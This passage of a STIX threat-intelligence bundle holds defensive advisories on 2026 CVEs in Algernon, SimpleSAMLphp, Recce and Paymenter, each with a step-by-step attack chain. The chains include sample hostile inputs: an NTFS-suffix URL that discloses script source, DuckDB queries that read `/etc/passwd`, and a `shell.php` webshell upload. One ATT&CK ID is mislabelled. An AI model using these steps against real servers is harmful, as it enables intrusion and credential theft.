      "relationship_type": "uses",
      "source_ref": "report--36dac4f7-10f2-5caf-85c2-6725293cfa57",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--423c6aeb-1db1-584a-8074-767c312c2688",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--36dac4f7-10f2-5caf-85c2-6725293cfa57",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--36dac4f7-10f2-5caf-85c2-6725293cfa57",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Algernon Server-Side Script Source Disclosure via NTFS Filename Manipulation (CVE-2026-52792)",
      "description": "## Overview\n\nCVE-2026-52792 exposes Algernon, a web server written in Go, to a critical server-side script source disclosure vulnerability when deployed on Windows operating systems. Affecting versions up to and including 1.17.8, this flaw stems from Algernon's file handler, which incorrectly interprets NTFS-equivalent filenames (e.g., `x.lua::$DATA`, `x.lua.`, `x.lua `). An unauthenticated client can append these suffixes to the URL of any server-side script (such as `.lua`, `.tl`, `.po2`) located on a public path. Instead of executing the script as intended, Algernon serves its raw source code, directly exposing embedded secrets like database connection strings, API keys, and the `SetCookieSecret` value. This vulnerability was published on 2026-07-02 and significantly impacts the confidentiality of sensitive information, potentially enabling attackers to forge session cookies and bypass authentication mechanisms.\n\n## Attack Chain\n\n1.  **Reconnaissance/Target Identification**: An attacker identifies an Algernon web server instance running on a Windows host that is publicly accessible via HTTP/HTTPS.\n2.  **Public Script Enumeration**: The attacker discovers or guesses the path to a server-side script (e.g., `index.lua`, `api.tl`) that is configured on a public path and is designed for execution rather than direct serving.\n3.  **Bypass Execution**: The attacker crafts a specially formatted HTTP GET request by appending an NTFS-equivalent suffix (e.g., `::$DATA`, a trailing dot `.`, or a trailing space `%20`) to the script's URL (e.g., `http://target/index.lua::$DATA`).\n4.  **Source Code Disclosure**: Due to the vulnerability, Algernon's `filepath.Ext()` function fails to recognize the script's true extension, bypassing the execution logic.\n5.  **Raw File Retrieval**: Algernon proceeds to open the manipulated filename using `os.Open()`, which, on Windows, resolves the NTFS-equivalent name back to the original script file.\n6.  **Secret Exfiltration**: The server streams the raw contents of the script file directly to the attacker, exposing any embedded secrets such as database credentials (`POSTGRES(\"postgres://app:S3cr3t@db/prod\")`) or `SetCookieSecret(\"hardcoded-session-key\")` values.\n\n## Impact\n\nThe successful exploitation of CVE-2026-52792 directly compromises the confidentiality of highly sensitive information. Attackers gain access to hardcoded database credentials, API keys, and session cookie secrets. For instance, a disclosed `SetCookieSecret` value enables an unauthenticated attacker to forge session cookies, allowing them to impersonate any user and bypass authentication mechanisms entirely, leading to unauthorized access. This can result in significant data breaches, privilege escalation, and complete compromise of the affected web application and potentially connected backend systems.\n\n## Recommendation\n\n*   **Patch CVE-2026-52792**: Upgrade Algernon to a patched version immediately to remediate the vulnerability.\n*   **Deploy Webserver Detection Rule**: Deploy the provided Sigma rule to your SIEM to detect attempts to access server-side scripts using NTFS-equivalent filenames.\n*   **Review `SetCookieSecret` Usage**: Audit all server-side scripts for hardcoded `SetCookieSecret` values and other sensitive credentials. Ensure these are retrieved from secure environment variables or a secrets management system.\n*   **Enable Webserver Logging**: Ensure detailed webserver access logs (`webserver` category) are collected and ingested into your SIEM, including full request paths, HTTP methods, and response status codes, to enable effective detection.\n",
      "published": "2026-07-03T11:12:06Z",
      "labels": [
        "webserver",
        "vulnerability",
        "code-disclosure",
        "server-side-vulnerability",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-mm6c-5j6x-hq8m"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d118eb2c-d811-5e9b-b030-c7b838440c91",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6017c499-a63b-5253-9944-5dea84e688fd",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f33a08dd-4769-5775-9e69-f198e54c0656",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6017c499-a63b-5253-9944-5dea84e688fd",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e7642eee-44eb-583c-a28a-bb18f8fbb665",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6017c499-a63b-5253-9944-5dea84e688fd",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6017c499-a63b-5253-9944-5dea84e688fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "SimpleSAMLphp SP IdP Bypass Vulnerability (CVE-2026-49284)",
      "description": "## Overview\n\nA vulnerability (CVE-2026-49284) has been identified in SimpleSAMLphp affecting versions up to 2.4.6 and between 2.5.0 and 2.5.1. This flaw stems from the Service Provider (SP) failing to enforce the intended Identity Provider (IdP) during an SP-initiated login, particularly in multi-IdP environments. Specifically, if a saved SP state expects a response from IdP A, but the Assertion Consumer Service (ACS) receives a valid SAML response from a different IdP (IdP B), SimpleSAMLphp logs a warning but proceeds to process the response. This behavior is critical when combined with the SP's handling of unsigned `samlp:Response/@InResponseTo` elements outside of signed assertions, especially if the signed assertion's `SubjectConfirmationData` lacks its own `InResponseTo`. This combination allows an attacker to bind a response from a trusted, but potentially lower-trust, IdP to SP state originally created for a higher-trust IdP, leading to authentication and authorization bypasses.\n\n## Attack Chain\n\n1.  **Initial Access / User Impersonation:** A legitimate user initiates an SP-initiated SAML login request to a SimpleSAMLphp SP, which expects authentication from a specific high-trust IdP (IdP A).\n2.  **Attacker Intercepts/Manipulates Flow:** An attacker manipulates the SAML exchange, potentially redirecting the user or crafting a SAML response from a trusted, but lower-assurance, IdP (IdP B) that the SP also trusts.\n3.  **Crafted SAML Response:** The attacker generates a SAML response from IdP B. This response contains a valid, signed assertion but deliberately omits the `InResponseTo` attribute within `SubjectConfirmationData`.\n4.  **Unsigned Response-Level `InResponseTo`:** The attacker also includes an unsigned `samlp:Response/@InResponseTo` attribute in the overall SAML response, which matches the expected value from the SP-initiated request.\n5.  **SimpleSAMLphp Processing Flaw:** The SimpleSAMLphp SP receives this crafted SAML response. Despite the `ExpectedIssuer` in its saved state pointing to IdP A, it processes the response from IdP B because the assertion is validly signed and the `InResponseTo` checks are bypassed by the combination of missing `SubjectConfirmationData/InResponseTo` and unsigned `Response/InResponseTo`.\n6.  **IdP Mismatch Ignored:** The SP issues a warning about the IdP mismatch but continues processing, accepting the authentication from IdP B.\n7.  **Authentication/Authorization Bypass:** The user is authenticated by the SP as if they had logged in via IdP A, potentially bypassing intended authorization checks or gaining access with different trust levels than expected.\n8.  **Unauthorized Access / Privilege Escalation:** If the application's authorization relies on the specific IdP used for login or its associated trust level, the attacker achieves unauthorized access or privilege escalation within the application.\n\n## Impact\n\nThis vulnerability significantly impacts deployments where SimpleSAMLphp functions as a Service Provider (SP) and trusts multiple Identity Providers (IdPs) with varying levels of assurance, different tenant boundaries, or distinct attribute namespaces. The primary consequence is an authentication and authorization bypass, enabling a lower-trust IdP to satisfy SP state created for a higher-trust or specific expected IdP. This can subvert security mechanisms designed to route users to particular IdPs, including configurations with `enable_unsolicited` set to `false`. Attackers could gain unauthorized access or escalate privileges within the application if authorization decisions are tied to the selected IdP or its trust context. The severity of the impact is contingent on the attacker's ability to obtain signed IdP-initiated assertions from a trusted, but less secure, IdP and how application authorization maps user identifiers.\n\n## Recommendation\n\n*   Upgrade SimpleSAMLphp to a patched version immediately to remediate `CVE-2026-49284`.\n*   Review your SimpleSAMLphp `sp-remote` configurations for any multi-IdP deployments that might be affected by `CVE-2026-49284`.\n",
      "published": "2026-07-03T11:11:00Z",
      "labels": [
        "saml",
        "vulnerability",
        "web-application",
        "authentication-bypass",
        "authorization-bypass"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-q8r6-xj3f-wrrm"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--55308490-d5fb-5248-8796-a14471291481",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e35c4e1d-521d-52e5-a230-f5bb3cf3e93c",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--63ab22f7-79a2-537d-8831-f8cd2fd405f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e35c4e1d-521d-52e5-a230-f5bb3cf3e93c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--72f5688c-2279-5e15-9661-43e815d66683",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e35c4e1d-521d-52e5-a230-f5bb3cf3e93c",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e35c4e1d-521d-52e5-a230-f5bb3cf3e93c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unauthenticated SQL Execution Vulnerability in Recce OSS Server (CVE-2026-49360)",
      "description": "## Overview\n\nA critical unauthenticated SQL execution vulnerability, identified as CVE-2026-49360, has been discovered in Recce OSS server versions up to `v1.49.0`. This flaw specifically affects deployments where the Recce server is exposed to an untrusted network without authentication and is configured to use a DuckDB-backed project. Exploitation allows an attacker to leverage DuckDB filesystem primitives through the `query run API` to perform arbitrary local file read and write operations on the server. The implications are significant, ranging from sensitive data disclosure and tampering with Recce/dbt artifacts to potential stored Cross-Site Scripting (XSS) via modification of browser-served static files. The severity of impact is heightened if Recce is running with elevated privileges (e.g., as root), as file access would occur with corresponding permissions. The vulnerability was responsibly reported by Sitampan (@hxcbtc) and patched in Recce `v1.50.0`.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a vulnerable Recce OSS server (`\u003c= v1.49.0`) exposed to an untrusted network.\n2.  The attacker sends a specially crafted HTTP request to the Recce server's `query run API` endpoint.\n3.  The request payload contains SQL commands leveraging DuckDB syntax and filesystem primitives, bypassing authentication.\n4.  The Recce server, running with a DuckDB-backed project, processes the malicious SQL query.\n5.  The embedded DuckDB filesystem functions (e.g., `READ_CSV`, `COPY`) are executed to access the server's local file system.\n6.  The attacker reads sensitive local files (e.g., `/etc/passwd`, database credentials, application configuration).\n7.  Alternatively, the attacker writes malicious content to server-accessible paths (e.g., modifying static files for stored XSS or corrupting application files).\n8.  Successful exploitation leads to data exfiltration, system compromise, or persistent defacement, with potential root privileges if the Recce process is running as root.\n\n## Impact\n\nThe observed impact of this vulnerability depends heavily on the Recce server's deployment configuration. Attackers can achieve unauthorized disclosure of local files, potentially exposing sensitive data, configuration files, or credentials accessible to the Recce server process. Tampering with Recce or dbt artifacts could lead to data integrity issues or supply chain attacks. Modification of browser-served static files might result in stored Cross-Site Scripting (XSS), affecting users interacting with the Recce interface. Furthermore, if application files themselves are writable, attackers could modify core application logic. If the Recce server is running with root privileges (a misconfiguration), the file access can occur with full root capabilities, leading to complete host or container compromise.\n\n## Recommendation\n\n*   **Patch CVE-2026-49360 immediately**: Upgrade all Recce server deployments to `v1.50.0` or later, as specified in the patches section of the advisory.\n*   **Implement network access controls**: Ensure `recce server` is not exposed to the public internet or any untrusted network, as mentioned in the workarounds section.\n*   **Deploy behind an authenticated proxy**: Place Recce behind an authenticated reverse proxy or VPN to enforce access control, as suggested in the workarounds section.\n*   **Enforce least privilege**: Run the Recce server process as a non-root user to limit the scope of file access in case of compromise, as advised in the workarounds section.\n*   **Restrict file system access**: Configure the application's filesystem as read-only where possible, and ensure sensitive files or credentials are not accessible to the Recce process.\n*   **Deploy the Sigma rule below**: Use the provided `Detect CVE-2026-49360 Exploitation - Recce DuckDB File Operations` rule in your SIEM to identify attempts to exploit this vulnerability.\n",
      "published": "2026-07-03T11:09:54Z",
      "labels": [
        "web-vulnerability",
        "sql-injection",
        "file-read-write",
        "rce",
        "data-exfiltration",
        "recce"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-rh62-j648-g5qc"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49360"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c57cf439-4926-5b1b-86fd-4e69c710c453",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/Paymenter/Paymenter/commit/87c3db42282ada1e3cda54b9a01f846926c0669b",
      "pattern": "[url:value = 'https://github.com/Paymenter/Paymenter/commit/87c3db42282ada1e3cda54b9a01f846926c0669b']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T11:08:47Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--acb0be02-af13-5b28-9e4c-8e3f5fc299d4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6d4c4abb-2037-5935-8191-34c6ad92b58d",
      "target_ref": "indicator--c57cf439-4926-5b1b-86fd-4e69c710c453"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a758726c-6d07-595d-aed7-bebb9102d030",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/Paymenter/Paymenter/releases/tag/v1.2.11",
      "pattern": "[url:value = 'https://github.com/Paymenter/Paymenter/releases/tag/v1.2.11']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T11:08:47Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1fb018c-7e07-578f-b1c6-213846d79fde",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6d4c4abb-2037-5935-8191-34c6ad92b58d",
      "target_ref": "indicator--a758726c-6d07-595d-aed7-bebb9102d030"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--de1c3b5b-5fca-5f42-b006-acef7c0b8654",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6d4c4abb-2037-5935-8191-34c6ad92b58d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b656d65a-0fd0-5667-895d-f802c25da411",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6d4c4abb-2037-5935-8191-34c6ad92b58d",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OS Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d4481adb-8e26-5354-929f-ccd9998a7b81",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6d4c4abb-2037-5935-8191-34c6ad92b58d",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a4edb810-9257-5329-ab7e-a0aeab025a9d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6d4c4abb-2037-5935-8191-34c6ad92b58d",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6d4c4abb-2037-5935-8191-34c6ad92b58d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Paymenter vulnerable to Remote Code Execution via public file uploads",
      "description": "## Overview\n\nA critical remote code execution (RCE) vulnerability, tracked as CVE-2025-58048, has been identified in Paymenter, a billing and client management software. This flaw specifically impacts the ticket attachments functionality, allowing a malicious authenticated user with low privileges to upload arbitrary files to the server. These files, when placed in a publicly accessible directory and subsequently executed due to improper web server configuration, grant attackers full control over the application and the underlying server. Exploitation enables malicious actors to extract sensitive data, including customer information from the database, read credentials from configuration files such as `.env`, and execute arbitrary system commands under the context of the web server user. The vulnerability is present in versions prior to v1.2.11 and was patched in commit `87c3db42282ada1e3cda54b9a01f846926c0669b`, released as v1.2.11.\n\n## Attack Chain\n\n1.  An authenticated, low-privileged user logs into the Paymenter application and accesses the ticket attachments functionality.\n2.  The attacker crafts and uploads a malicious file, such as a webshell (e.g., `shell.php`), masquerading it as a legitimate attachment.\n3.  The Paymenter application processes the upload and stores the malicious file in a publicly accessible directory, typically `/storage/`.\n4.  The attacker then directly accesses the uploaded malicious file (e.g., `https://[paymenter_domain]/storage/shell.php`) via a web browser or automated tool.\n5.  Due to an insecure web server configuration (e.g., Nginx serving `/storage/` files without forcing a download), the server executes the malicious file instead of serving it as static content.\n6.  The executed webshell grants the attacker Remote Code Execution (RCE) capabilities under the web server's user context.\n7.  Leveraging RCE, the attacker extracts sensitive data from the database, reads credentials from configuration files (e.g., `.env`), or executes arbitrary system commands to further compromise the server.\n\n## Impact\n\nThis vulnerability is deemed Critical as it allows a low-privilege authenticated user to fully compromise the Paymenter application and its underlying server. If exploited, attackers can gain unauthorized access to sensitive customer information stored in the database, pilfer critical credentials from `.env` or other configuration files, and execute arbitrary system commands. This level of access permits complete control over the affected system, enabling data exfiltration, further lateral movement, and potential disruption of services. While specific victim counts are not available, any Paymenter installation running a vulnerable version is at risk, particularly those that handle customer data and payments.\n\n## Recommendation\n\n*   **Patch CVE-2025-58048 immediately:** Upgrade Paymenter to version v1.2.11 or later as described in the patches section of this brief.\n*   **Apply Nginx mitigation:** If immediate upgrade is not possible, implement the provided Nginx configuration to force downloads for files in the `/storage/` directory, preventing their execution as described in the content section.\n*   **Deploy WAF controls:** Utilize a Web Application Firewall (WAF) to disallow direct access to the `/storage/` directory, as mentioned in the workaround section, until the patch can be applied.\n",
      "published": "2026-07-03T11:08:47Z",
      "labels": [
        "remote-code-execution",
        "web-application",
        "php",
        "critical-vulnerability",
        "file-upload",
        "webshell"
      ],
      "object_refs": [
        "indicator--c57cf439-4926-5b1b-86fd-4e69c710c453",
        "indicator--a758726c-6d07-595d-aed7-bebb9102d030",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-5pm9-r2m8-rcmj"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Paymenter/Paymenter/commit/87c3db42282ada1e3cda54b9a01f846926c0669b"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Paymenter/Paymenter/releases/tag/v1.2.11"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--89a3acce-0c8e-59a3-891c-881a069a7fea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f789b31-fc8c-5ba7-9ca2-7dc7312d46de",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cbd62561-28e1-57fe-bcc7-8dc506531424",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f789b31-fc8c-5ba7-9ca2-7dc7312d46de",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5ad8c3a7-e77c-5a40-9ef8-7dbe46142c97",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f789b31-fc8c-5ba7-9ca2-7dc7312d46de",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ae19af3f-ea28-5240-9ede-1e089c48718b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f789b31-fc8c-5ba7-9ca2-7dc7312d46de",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Supply Chain Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1195",
          "url": "https://attack.mitre.org/techniques/T1195"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d7eb07e6-6503-582e-934d-2a614a4147ac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f789b31-fc8c-5ba7-9ca2-7dc7312d46de",
      "target_ref": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2f789b31-fc8c-5ba7-9ca2-7dc7312d46de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Mise Vulnerable to Arbitrary Code Execution via Tera Templates in .tool-versions Files (Trust Bypass)",
